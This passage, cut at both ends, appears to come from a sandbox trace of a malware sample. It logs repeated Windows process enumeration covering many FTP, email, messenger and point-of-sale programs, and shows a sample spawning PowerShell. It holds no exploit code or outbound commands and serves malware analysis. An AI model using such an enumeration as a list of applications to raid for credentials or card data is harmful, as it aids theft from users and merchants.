szExeFile="accept.exe")) returned 1 [0256.222] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0256.224] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0256.225] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0256.228] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0256.229] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0256.231] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0256.232] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0256.234] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0256.235] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0256.304] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0256.305] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0256.307] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0256.309] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0256.311] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0256.313] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0256.315] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0256.317] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0256.319] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0256.321] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0256.323] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0256.325] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0256.327] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0256.329] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0256.331] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0256.333] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0256.336] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0256.378] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0256.380] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0256.382] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0256.385] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0256.387] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0256.389] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0256.390] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0256.392] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0256.394] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0256.396] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0256.397] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0256.399] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0256.401] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0256.403] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0256.405] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0256.406] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0256.408] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0256.410] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0256.412] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0256.455] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0256.457] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0256.459] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0256.460] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0256.462] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0256.464] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0256.466] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0256.468] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0256.469] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0256.471] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0256.473] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0256.475] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0256.476] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0256.478] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0256.480] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0256.481] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="9DC0.exe")) returned 1 [0256.485] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x778, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0256.487] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x610, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0256.488] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0256.490] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="powershell.exe")) returned 1 [0256.491] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0256.530] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x10b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0256.532] CloseHandle (hObject=0x2338) returned 1 [0256.532] Sleep (dwMilliseconds=0x64) [0256.579] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2338 [0256.591] Process32First (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0256.592] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x71, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0256.598] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0256.599] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.601] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0256.602] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0256.604] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0256.605] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0256.607] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0256.609] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.610] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.612] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0256.613] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.615] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.655] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0256.656] Process32Next (in: hSnapshot=0x2338, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, 